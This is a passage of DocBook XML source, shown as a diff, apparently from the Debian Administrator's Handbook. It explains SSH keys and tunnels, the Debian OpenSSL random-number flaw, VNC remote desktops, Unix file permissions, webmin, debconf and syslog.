+					The user generates a key pair on the client machine with <command>ssh-keygen -t rsa</command>; the public key is stored in <filename>~/.ssh/id_rsa.pub</filename>, while the corresponding private key is stored in <filename>~/.ssh/id_rsa</filename>. The user then uses <command>ssh-copy-id <replaceable>server</replaceable></command> to add their public key to the <filename>~/.ssh/authorized_keys</filename> file on the server. If the private key was not protected with a “passphrase” at the time of its creation, all subsequent logins on the server will work without a password. Otherwise, the private key must be decrypted each time by entering the passphrase. Fortunately, <command>ssh-agent</command> allows us to keep private keys in memory to not have to regularly re-enter the password. For this, you simply use <command>ssh-add</command> (once per work session) provided that the session is already associated with a functional instance of <command>ssh-agent</command>. Debian activates it by default in graphical sessions, but this can be deactivated by changing <filename>/etc/X11/Xsession.options</filename>. For a console session, you can manually start it with <command>eval $(ssh-agent)</command>.
+				</para>
+				 <sidebar> <title><emphasis>SECURITY</emphasis> Protection of the private key</title>
+				 <para>
+					Whoever has the private key can login on the account thus configured. This is why access to the private key is protected by a “passphrase”. Someone who acquires a copy of a private key file (for example, <filename>~/.ssh/id_rsa</filename>) still has to know this phrase in order to be able to use it. This additional protection is not, however, impregnable, and if you think that this file has been compromised, it is best to disable that key on the computers in which it has been installed (by removing it from the <filename>authorized_keys</filename> files) and replacing it with a newly generated key.
+				</para>
+				 </sidebar> <sidebar> <title><emphasis>CULTURE</emphasis> OpenSSL flaw in Debian <emphasis role="distribution">Etch</emphasis></title>
+				 <para>
+					The OpenSSL library, as initially provided in Debian <emphasis role="distribution">Etch</emphasis>, had a serious problem in its random number generator (RNG). Indeed, the Debian maintainer had made a change so that applications using it would no longer generate warnings when analyzed by memory testing tools like <command>valgrind</command>. Unfortunately, this change also meant that the RNG was employing only one source of entropy corresponding to the process number (PID) whose 32,000 possible values do not offer enough randomness. <ulink type="block" url="http://www.debian.org/security/2008/dsa-1571" />
+				</para>
+				 <para>
+					Specifically, whenever OpenSSL was used to generate a key, it always produced a key within a known set of hundreds of thousands of keys (32,000 multiplied by a small number of key lengths). This affected SSH keys, SSL keys, and X.509 certificates used by numerous applications, such as OpenVPN. A cracker had only to try all of the keys to gain unauthorized access. To reduce the impact of the problem, the SSH daemon was modified to refuse problematic keys that are listed in the <emphasis role="pkg">openssh-blacklist</emphasis> and <emphasis role="pkg">openssh-blacklist-extra</emphasis> packages. Additionally, the <command>ssh-vulnkey</command> command allows identification of possibly compromised keys in the system.
+				</para>
+				 <para>
+					A more thorough analysis of this incident brings to light that it is the result of multiple (small) problems, both within the OpenSSL project and with the Debian package maintainer. A widely used library like OpenSSL should — without modifications — not generate warnings when tested by <command>valgrind</command>. Furthermore, the code (especially the parts as sensitive as the RNG) should be better commented to prevent such errors. On Debian's side, the maintainer wanted to validate the modifications with the OpenSSL developers, but simply explained the modifications without providing the corresponding patch to review and failed to mention his role within Debian. Finally, the maintenance choices were sub-optimal: the changes made to the original code were not clearly documented; all the modifications were effectively stored in a Subversion repository, but they ended up all lumped into one single patch during creation of the source package.
+				</para>
+				 <para>
+					It is difficult under such conditions to find the corrective measures to prevent such incidents from recurring. The lesson to be learned here is that every divergence Debian introduces to upstream software must be justified, documented, submitted to the upstream project when possible, and widely publicized. It is from this perspective that the new source package format (“3.0 (quilt)”) and the Debian sources webservice were developed. <ulink type="block" url="http://sources.debian.org" />
+				</para>
+				 </sidebar>
+			</section>
+			 <section id="sect.ssh-x11">
+				<title>Using Remote X11 Applications</title>
+				 <para>
+					The SSH protocol allows forwarding of graphical data (“X11” session, from the name of the most widespread graphical system in Unix); the server then keeps a dedicated channel for those data. Specifically, a graphical program executed remotely can be displayed on the X.org server of the local screen, and the whole session (input and display) will be secure. Since this feature allows remote applications to interfere with the local system, it is disabled by default. You can enable it by specifying <literal>X11Forwarding yes</literal> in the server configuration file (<filename>/etc/ssh/sshd_config</filename>). Finally, the user must also request it by adding the <literal>-X</literal> option to the <command>ssh</command> command-line.
+				</para>
+
+			</section>
+			 <section id="sect.ssh-port-forwarding">
+				<title>Creating Encrypted Tunnels with Port Forwarding</title>
+				 <indexterm>
+					<primary>port forwarding</primary>
+				</indexterm>
+				 <para>
+					Its <literal>-R</literal> and <literal>-L</literal> options allow <command>ssh</command> to create “encrypted tunnels” between two machines, securely forwarding a local TCP port (see sidebar <xref linkend="sidebar.tcp-udp" />) to a remote machine or vice versa.
+				</para>
+				 <sidebar> <title><emphasis>VOCABULARY</emphasis> Tunnel</title>
+				 <indexterm>
+					<primary>tunnel (SSH)</primary>
+					<seealso>VPN</seealso>
+				</indexterm>
+				 <indexterm>
+					<primary>SSH tunnel</primary>
+					<seealso>VPN</seealso>
+				</indexterm>
+				 <para>
+					The Internet, and most LANs that are connected to it, operate in packet mode and not in connected mode, meaning that a packet issued from one computer to another is going to be stopped at several intermediary routers to find its way to its destination. You can still simulate a connected operation where the stream is encapsulated in normal IP packets. These packets follow their usual route, but the stream is reconstructed unchanged at the destination. We call this a “tunnel”, analogous to a road tunnel in which vehicles drive directly from the entrance (input) to the exit (output) without encountering any intersections, as opposed to a path on the surface that would involve intersections and changing direction.
+				</para>
+				 <para>
+					You can use this opportunity to add encryption to the tunnel: the stream that flows through it is then unrecognizable from the outside, but it is returned in decrypted form at the exit of the tunnel.
+				</para>
+				 </sidebar> <para>
+					<command>ssh -L 8000:server:25 intermediary</command> establishes an SSH session with the <replaceable>intermediary</replaceable> host and listens to local port 8000 (see <xref linkend="figure.ssh-L" />). For any connection established on this port, <command>ssh</command> will initiate a connection from the <replaceable>intermediary</replaceable> computer to port 25 on the <replaceable>server</replaceable>, and will bind both connections together.
+				</para>
+				 <para>
+					<command>ssh -R 8000:server:25 intermediary</command> also establishes an SSH session to the <replaceable>intermediary</replaceable> computer, but it is on this machine that <command>ssh</command> listens to port 8000 (see <xref linkend="figure.ssh-R" />). Any connection established on this port will cause <command>ssh</command> to open a connection from the local machine on to port 25 of the <replaceable>server</replaceable>, and to bind both connections together.
+				</para>
+				 <para>
+					In both cases, connections are made to port 25 on the <replaceable>server</replaceable> host, which pass through the SSH tunnel established between the local machine and the <replaceable>intermediary</replaceable> machine. In the first case, the entrance to the tunnel is local port 8000, and the data move towards the <replaceable>intermediary</replaceable> machine before being directed to the <replaceable>server</replaceable> on the “public” network. In the second case, the input and output in the tunnel are reversed; the entrance is port 8000 on the <replaceable>intermediary</replaceable> machine, the output is on the local host, and the data are then directed to the <replaceable>server</replaceable>. In practice, the server is usually either the local machine or the intermediary. That way SSH secures the connection from one end to the other.
+				</para>
+				 <figure id="figure.ssh-L">
+					<title>Forwarding a local port with SSH</title>
+					 <mediaobject>
+						<imageobject>
+							<imagedata fileref="images/ssh-L.png" format="PNG" width="35%" />
+						</imageobject>
+
+					</mediaobject>
+
+				</figure>
+				 <figure id="figure.ssh-R">
+					<title>Forwarding a remote port with SSH</title>
+					 <mediaobject>
+						<imageobject>
+							<imagedata fileref="images/ssh-R.png" format="PNG" width="35%" />
+						</imageobject>
+
+					</mediaobject>
+
+				</figure>
+
+			</section>
+
+		</section>
+		 <section id="sect.remote-desktops">
+			<title>Using Remote Graphical Desktops</title>
+			 <para>
+				VNC (Virtual Network Computing) allows remote access to graphical desktops.
+			</para>
+			 <indexterm>
+				<primary>VNC</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Virtual Network Computing</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>graphical desktop</primary>
+				<secondary>remote</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>remote graphical desktop</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>desktop, remote graphical desktop</primary>
+			</indexterm>
+			 <para>
+				This tool is mostly used for technical assistance; the administrator can see the errors that the user is facing, and show them the correct course of action without having to stand by them.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">vino</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="pkg">krfb</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="pkg">x11vnc</emphasis></primary>
+			</indexterm>
+			 <para>
+				First, the user must authorize sharing their session. The GNOME graphical desktop environment in <emphasis role="distribution">Jessie</emphasis> includes that option in its configuration panel (contrary to previous versions of Debian, where the user had to install and run <command>vino</command>). KDE Plasma still requires using <command>krfb</command> to allow sharing an existing session over VNC. For other graphical desktop environments, the <command>x11vnc</command> command (from the Debian package of the same name) serves the same purpose; you can make it available to the user with an explicit icon.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">vinagre</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="pkg">tsclient</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="pkg">krdc</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="pkg">xvnc4viewer</emphasis></primary>
+			</indexterm>
+			 <para>
+				When the graphical session is made available by VNC, the administrator must connect to it with a VNC client. GNOME has <command>vinagre</command> and <command>remmina</command> for that, while the KDE project provides <command>krdc</command> (in the menu at <menuchoice> <guimenu>K</guimenu> <guisubmenu>Internet</guisubmenu> <guimenuitem>Remote Desktop Client</guimenuitem></menuchoice>). There are other VNC clients that use the command line, such as <command>xvnc4viewer</command> in the Debian package of the same name. Once connected, the administrator can see what is going on, work on the machine remotely, and show the user how to proceed.
+			</para>
+			 <sidebar> <title><emphasis>SECURITY</emphasis> VNC over SSH</title>
+			 <indexterm>
+				<primary>SSH tunnel</primary>
+				<secondary>VNC</secondary>
+			</indexterm>
+			 <para>
+				If you want to connect by VNC, and you don't want your data sent in clear text on the network, it is possible to encapsulate the data in an SSH tunnel (see <xref linkend="sect.ssh-port-forwarding" />). You simply have to know that VNC uses port 5900 by default for the first screen (called “localhost:0”), 5901 for the second (called “localhost:1”), etc.
+			</para>
+			 <para>
+				The <command>ssh -L localhost:5901:localhost:5900 -N -T <replaceable>machine</replaceable></command> command creates a tunnel between local port 5901 in the localhost interface and port 5900 of the <replaceable>machine</replaceable> host. The first “localhost” restricts SSH to listening to only that interface on the local machine. The second “localhost” indicates the interface on the remote machine which will receive the network traffic entering in “localhost:5901”. Thus <command>vncviewer localhost:1</command> will connect the VNC client to the remote screen, even though you indicate the name of the local machine.
+			</para>
+			 <para>
+				When the VNC session is closed, remember to close the tunnel by also quitting the corresponding SSH session.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Display manager</title>
+			 <indexterm>
+				<primary><command>gdm3</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>kdm</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>xdm</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>lightdm</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>manager</primary>
+				<secondary>display manager</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>display manager</primary>
+			</indexterm>
+			 <para>
+				<command>gdm3</command>, <command>kdm</command>, <command>lightdm</command>, and <command>xdm</command> are Display Managers. They take control of the graphical interface shortly after boot in order to provide the user a login screen. Once the user has logged in, they execute the programs needed to start a graphical work session.
+			</para>
+			 </sidebar> <para>
+				VNC also works for mobile users, or company executives, who occasionally need to login from their home to access a remote desktop similar to the one they use at work. The configuration of such a service is more complicated: you first install the <emphasis role="pkg">vnc4server</emphasis> package, change the configuration of the display manager to accept <literal>XDMCP Query</literal> requests (for <command>gdm3</command>, this can be done by adding <literal>Enable=true</literal> in the “xdmcp” section of <filename>/etc/gdm3/daemon.conf</filename>), and finally, start the VNC server with <command>inetd</command> so that a session is automatically started when a user tries to login. For example, you may add this line to <filename>/etc/inetd.conf</filename>:
+			</para>
+			 
+<programlisting>5950  stream  tcp  nowait  nobody.tty  /usr/bin/Xvnc Xvnc -inetd -query localhost -once -geometry 1024x768 -depth 16 securitytypes=none
+</programlisting>
+			 <para>
+				Redirecting incoming connections to the display manager solves the problem of authentication, because only users with local accounts will pass the <command>gdm3</command> login screen (or equivalent <command>kdm</command>, <command>xdm</command>, etc.). As this operation allows multiple simultaneous logins without any problem (provided the server is powerful enough), it can even be used to provide complete desktops for mobile users (or for less powerful desktop systems, configured as thin clients). Users simply login to the server's screen with <command>vncviewer <replaceable>server</replaceable>:50</command>, because the port used is 5950.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">vnc4server</emphasis></primary>
+			</indexterm>
+
+		</section>
+
+	</section>
+	 <section id="sect.rights-management">
+		<title>Managing Rights</title>
+		 <para>
+			Linux is definitely a multi-user system, so it is necessary to provide a permission system to control the set of authorized operations on files and directories, which includes all the system resources and devices (on a Unix system, any device is represented by a file or directory). This principle is common to all Unix systems, but a reminder is always useful, especially as there are some interesting and relatively unknown advanced uses.
+		</para>
+		 <indexterm>
+			<primary>rights</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>permissions</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>user</primary>
+			<secondary>owner</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>group</primary>
+			<secondary>owner</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>owner</primary>
+			<secondary>user</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>owner</primary>
+			<secondary>group</secondary>
+		</indexterm>
+		 <para>
+			Each file or directory has specific permissions for three categories of users:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					its owner (symbolized by <literal>u</literal> as in “user”);
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					its owner group (symbolized by <literal>g</literal> as in “group”), representing all the members of the group;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					the others (symbolized by <literal>o</literal> as in “other”).
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <para>
+			Three types of rights can be combined:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					reading (symbolized by <literal>r</literal> as in “read”);
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					writing (or modifying, symbolized by <literal>w</literal> as in “write”);
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					executing (symbolized by <literal>x</literal> as in “eXecute”).
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <indexterm>
+			<primary>read, right</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>write, right</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>modification, right</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>execution, right</primary>
+		</indexterm>
+		 <para>
+			In the case of a file, these rights are easily understood: read access allows reading the content (including copying), write access allows changing it, and execute access allows you to run it (which will only work if it is a program).
+		</para>
+		 <sidebar> <title><emphasis>SECURITY</emphasis> <literal>setuid</literal> and <literal>setgid</literal> executables</title>
+		 <para>
+			Two particular rights are relevant to executable files: <literal>setuid</literal> and <literal>setgid</literal> (symbolized with the letter “s”). Note that we frequently speak of “bit”, since each of these boolean values can be represented by a 0 or a 1. These two rights allow any user to execute the program with the rights of the owner or the group, respectively. This mechanism grants access to features requiring higher level permissions than those you would usually have.
+		</para>
+		 <indexterm>
+			<primary><literal>setuid</literal>, right</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><literal>setgid</literal>, right</primary>
+		</indexterm>
+		 <para>
+			Since a <literal>setuid</literal> root program is systematically run under the super-user identity, it is very important to ensure it is secure and reliable. Indeed, a user who would manage to subvert it to call a command of their choice could then impersonate the root user and have all rights on the system.
+		</para>
+		 </sidebar> <para>
+			A directory is handled differently. Read access gives the right to consult the list of its entries (files and directories), write access allows creating or deleting files, and execute access allows crossing through it (especially to go there with the <command>cd</command> command). Being able to cross through a directory without being able to read it gives permission to access the entries therein that are known by name, but not to find them if you do not know their existence or their exact name.
+		</para>
+		 <sidebar id="sidebar.setgid-dir"> <title><emphasis>SECURITY</emphasis> <literal>setgid</literal> directory and <emphasis>sticky bit</emphasis></title>
+		 <indexterm>
+			<primary><literal>setgid</literal> directory</primary>
+		</indexterm>
+		 <para>
+			The <literal>setgid</literal> bit also applies to directories. Any newly-created item in such directories is automatically assigned the owner group of the parent directory, instead of inheriting the creator's main group as usual. This setup avoids the user having to change its main group (with the <command>newgrp</command> command) when working in a file tree shared between several users of the same dedicated group.
+		</para>
+		 <indexterm>
+			<primary>sticky bit</primary>
+		</indexterm>
+		 <para>
+			The “sticky” bit (symbolized by the letter “t”) is a permission that is only useful in directories. It is especially used for temporary directories where everybody has write access (such as <filename>/tmp/</filename>): it restricts deletion of files so that only their owner (or the owner of the parent directory) can do it. Lacking this, everyone could delete other users' files in <filename>/tmp/</filename>.
+		</para>
+		 </sidebar> <para>
+			Three commands control the permissions associated with a file:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					<command>chown <replaceable>user</replaceable> <replaceable>file</replaceable></command> changes the owner of the file;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					<command>chgrp <replaceable>group</replaceable> <replaceable>file</replaceable></command> alters the owner group;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					<command>chmod <replaceable>rights</replaceable> <replaceable>file</replaceable></command> changes the permissions for the file.
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <para>
+			There are two ways of presenting rights. Among them, the symbolic representation is probably the easiest to understand and remember. It involves the letter symbols mentioned above. You can define rights for each category of users (<literal>u</literal>/<literal>g</literal>/<literal>o</literal>), by setting them explicitly (with <literal>=</literal>), by adding (<literal>+</literal>), or subtracting (<literal>-</literal>). Thus the <literal>u=rwx,g+rw,o-r</literal> formula gives the owner read, write, and execute rights, adds read and write rights for the owner group, and removes read rights for other users. Rights not altered by the addition or subtraction in such a command remain unmodified. The letter <literal>a</literal>, for “all”, covers all three categories of users, so that <literal>a=rx</literal> grants all three categories the same rights (read and execute, but not write).
+		</para>
+		 <indexterm>
+			<primary><command>chmod</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>chown</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>chgrp</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>octal representation of rights</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>rights</primary>
+			<secondary>octal representation</secondary>
+		</indexterm>
+		 <para>
+			The (octal) numeric representation associates each right with a value: 4 for read, 2 for write, and 1 for execute. We associate each combination of rights with the sum of the figures. Each value is then assigned to different categories of users by putting them end to end in the usual order (owner, group, others).
+		</para>
+		 <para>
+			For instance, the <command>chmod 754 <replaceable>file</replaceable></command> command will set the following rights: read, write and execute for the owner (since 7 = 4 + 2 + 1); read and execute for the group (since 5 = 4 + 1); read-only for others. The <literal>0</literal> means no rights; thus <command>chmod 600 <replaceable>file</replaceable></command> allows for read/write rights for the owner, and no rights for anyone else. The most frequent right combinations are <literal>755</literal> for executable files and directories, and <literal>644</literal> for data files.
+		</para>
+		 <para>
+			To represent special rights, you can prefix a fourth digit to this number according to the same principle, where the <literal>setuid</literal>, <literal>setgid</literal> and <literal>sticky</literal> bits are 4, 2 and 1, respectively. <command>chmod 4754</command> will associate the <literal>setuid</literal> bit with the previously described rights.
+		</para>
+		 <para>
+			Note that the use of octal notation only allows to set all the rights at once on a file; you cannot use it to simply add a new right, such as read access for the group owner, since you must take into account the existing rights and compute the new corresponding numerical value.
+		</para>
+		 <sidebar> <title><emphasis>TIP</emphasis> Recursive operation</title>
+		 <para>
+			Sometimes we have to change rights for an entire file tree. All the commands above have a <literal>-R</literal> option to operate recursively in sub-directories.
+		</para>
+		 <para>
+			The distinction between directories and files sometimes causes problems with recursive operations. That is why the “X” letter has been introduced in the symbolic representation of rights. It represents a right to execute which applies only to directories (and not to files lacking this right). Thus, <command>chmod -R a+X <replaceable>directory</replaceable></command> will only add execute rights for all categories of users (<literal>a</literal>) for all of the sub-directories and files for which at least one category of user (even if their sole owner) already has execute rights.
+		</para>
+		 </sidebar> <sidebar> <title><emphasis>TIP</emphasis> Changing the user and group</title>
+		 <para>
+			Frequently you want to change the group of a file at the same time that you change the owner. The <command>chown</command> command has a special syntax for that: <command>chown <replaceable>user</replaceable>:<replaceable>group</replaceable> <replaceable>file</replaceable></command>
+		</para>
+		 </sidebar> <sidebar> <title><emphasis>GOING FURTHER</emphasis> <command>umask</command></title>
+		 <para>
+			When an application creates a file, it assigns indicative permissions, knowing that the system automatically removes certain rights, given by the command <command>umask</command>. Enter <command>umask</command> in a shell; you will see a mask such as <computeroutput>0022</computeroutput>. This is simply an octal representation of the rights to be systematically removed (in this case, the write right for the group and other users).
+		</para>
+		 <indexterm>
+			<primary>umask</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>rights</primary>
+			<secondary>mask</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>mask</primary>
+			<secondary>rights mask</secondary>
+		</indexterm>
+		 <para>
+			If you give it a new octal value, the <command>umask</command> command modifies the mask. Used in a shell initialization file (for example, <filename>~/.bash_profile</filename>), it will effectively change the default mask for your work sessions.
+		</para>
+		 </sidebar>
+	</section>
+	 <section id="sect.administration-interfaces">
+		<title>Administration Interfaces</title>
+		 <indexterm>
+			<primary>interface</primary>
+			<secondary>administration interface</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>administration, interfaces</primary>
+		</indexterm>
+		 <para>
+			Using a graphical interface for administration is interesting in various circumstances. An administrator does not necessarily know all the configuration details for all their services, and doesn't always have the time to go seeking out the documentation on the matter. A graphical interface for administration can thus accelerate the deployment of a new service. It can also simplify the setup of services which are hard to configure.
+		</para>
+		 <para>
+			Such an interface is only an aid, and not an end in itself. In all cases, the administrator must master its behavior in order to understand and work around any potential problem.
+		</para>
+		 <para>
+			Since no interface is perfect, you may be tempted to try several solutions. This is to be avoided as much as possible, since different tools are sometimes incompatible in their work methods. Even if they all aim to be very flexible and try to adopt the configuration file as a single reference, they are not always able to integrate external changes.
+		</para>
+		 <section id="sect.webmin">
+			<title>Administrating on a Web Interface: <command>webmin</command></title>
+			 <indexterm>
+				<primary><emphasis>webmin</emphasis></primary>
+			</indexterm>
+			 <para>
+				This is, without a doubt, one of the most successful administration interfaces. It is a modular system managed through a web browser, covering a wide array of areas and tools. Furthermore, it is internationalized and available in many languages.
+			</para>
+			 <para>
+				Sadly, <command>webmin</command> is no longer part of Debian. Its Debian maintainer — Jaldhar H. Vyas — removed the packages he created because he no longer had the time required to maintain them at an acceptable quality level. Nobody has officially taken over, so <emphasis role="distribution">Jessie</emphasis> does not have the <command>webmin</command> package.
+			</para>
+			 <para>
+				There is, however, an unofficial package distributed on the <literal>webmin.com</literal> website. Contrary to the original Debian packages, this package is monolithic; all of its configuration modules are installed and activated by default, even if the corresponding service is not installed on the machine.
+			</para>
+			 <sidebar> <title><emphasis>SECURITY</emphasis> Changing the root password</title>
+			 <para>
+				On the first login, identification is conducted with the root username and its usual password. It is recommended to change the password used for <command>webmin</command> as soon as possible, so that if it is compromised, the root password for the server will not be involved, even if this confers important administrative rights to the machine.
+			</para>
+			 <para>
+				Beware! Since <command>webmin</command> has so many features, a malicious user accessing it could compromise the security of the entire system. In general, interfaces of this kind are not recommended for important systems with strong security constraints (firewall, sensitive servers, etc.).
+			</para>
+			 </sidebar> <para>
+				Webmin is used through a web interface, but it does not require Apache to be installed. Essentially, this software has its own integrated mini web server. This server listens by default on port 10000 and accepts secure HTTP connections.
+			</para>
+			 <para>
+				Included modules cover a wide variety of services, among which:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						all base services: creation of users and groups, management of <filename>crontab</filename> files, init scripts, viewing of logs, etc.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						bind: DNS server configuration (name service);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						postfix: SMTP server configuration (e-mail);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						inetd: configuration of the <command>inetd</command> super-server;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						quota: user quota management;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						dhcpd: DHCP server configuration;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						proftpd: FTP server configuration;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						samba: Samba file server configuration;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						software: installation or removal of software from Debian packages and system updates.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				The administration interface is available in a web browser at <literal>https://localhost:10000</literal>. Beware! Not all the modules are directly usable. Sometimes they must be configured by specifying the locations of the corresponding configuration files and some executable files (program). Frequently the system will politely prompt you when it fails to activate a requested module.
+			</para>
+			 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> GNOME control center</title>
+			 <indexterm>
+				<primary><emphasis role="pkg">gnome-control-center</emphasis></primary>
+			</indexterm>
+			 <para>
+				The GNOME project also provides multiple administration interfaces that are usually accessible via the “Settings” entry in the user menu on the top right. <command>gnome-control-center</command> is the main program that brings them all together but many of the system wide configuration tools are effectively provided by other packages (<emphasis role="pkg">accountsservice</emphasis>, <emphasis role="pkg">system-config-printer</emphasis>, etc.). Although they are easy to use, these applications cover only a limited number of base services: user management, time configuration, network configuration, printer configuration, and so on.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.debconf">
+			<title>Configuring Packages: <command>debconf</command></title>
+			 <indexterm>
+				<primary><command>debconf</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>dpkg-reconfigure</command></primary>
+			</indexterm>
+			 <para>
+				Many packages are automatically configured after asking a few questions during installation through the Debconf tool. These packages can be reconfigured by running <command>dpkg-reconfigure <replaceable>package</replaceable></command>.
+			</para>
+			 <para>
+				For most cases, these settings are very simple; only a few important variables in the configuration file are changed. These variables are often grouped between two “demarcation” lines so that reconfiguration of the package only impacts the enclosed area. In other cases, reconfiguration will not change anything if the script detects a manual modification of the configuration file, in order to preserve these human interventions (because the script can't ensure that its own modifications will not disrupt the existing settings).
+			</para>
+			 <sidebar> <title><emphasis>DEBIAN POLICY</emphasis> Preserving changes</title>
+			 <para>
+				The Debian Policy expressly stipulates that everything should be done to preserve manual changes made to a configuration file, so more and more scripts take precautions when editing configuration files. The general principle is simple: the script will only make changes if it knows the status of the configuration file, which is verified by comparing the checksum of the file against that of the last automatically generated file. If they are the same, the script is authorized to change the configuration file. Otherwise, it determines that the file has been changed and asks what action it should take (install the new file, save the old file, or try to integrate the new changes with the existing file). This precautionary principle has long been unique to Debian, but other distributions have gradually begun to embrace it.
+			</para>
+			 <para>
+				The <command>ucf</command> program (from the Debian package of the same name) can be used to implement such a behavior.
+			</para>
+			 <indexterm>
+				<primary><command>ucf</command></primary>
+			</indexterm>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.syslog">
+		<title><command>syslog</command> System Events</title>
+		 <indexterm>
+			<primary><command>rsyslogd</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>files</primary>
+			<secondary>log files</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>logs</primary>
+			<secondary>dispatching</secondary>
+		</indexterm>
+		 <section id="sect.syslog-principe">
+			<title>Principle and Mechanism</title>
+			 <para>
+				The <command>rsyslogd</command> daemon is responsible for collecting service messages coming from applications and the kernel, then dispatching them into log files (usually stored in the <filename>/var/log/</filename> directory). It obeys the <filename>/etc/rsyslog.conf</filename> configuration file.
+			</para>
+			 <para>
+				Each log message is associated with an application subsystem (called “facility” in the documentation):
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>auth</literal> and <literal>authpriv</literal>: for authentication;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>cron</literal>: comes from task scheduling services, <command>cron</command> and <command>atd</command>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>daemon</literal>: affects a daemon without any special classification (DNS, NTP, etc.);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>ftp</literal>: concerns the FTP server;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>kern</literal>: message coming from the kernel;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>lpr</literal>: comes from the printing subsystem;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>mail</literal>: comes from the e-mail subsystem;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>news</literal>: Usenet subsystem message (especially from an NNTP — Network News Transfer Protocol — server that manages newsgroups);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>syslog</literal>: messages from the <command>syslogd</command> server, itself;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>user</literal>: user messages (generic);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>uucp</literal>: messages from the UUCP server (Unix to Unix Copy Program, an old protocol notably used to distribute e-mail messages);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>local0</literal> to <literal>local7</literal>: reserved for local use.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Each message is also associated with a priority level. Here is the list in decreasing order:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>emerg</literal>: “Help!” There is an emergency, the system is probably unusable.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>alert</literal>: hurry up, any delay can be dangerous, action must be taken immediately;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>crit</literal>: conditions are critical;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>err</literal>: error;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>warn</literal>: warning (potential error);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>notice</literal>: conditions are normal, but the message is important;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>info</literal>: informative message;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
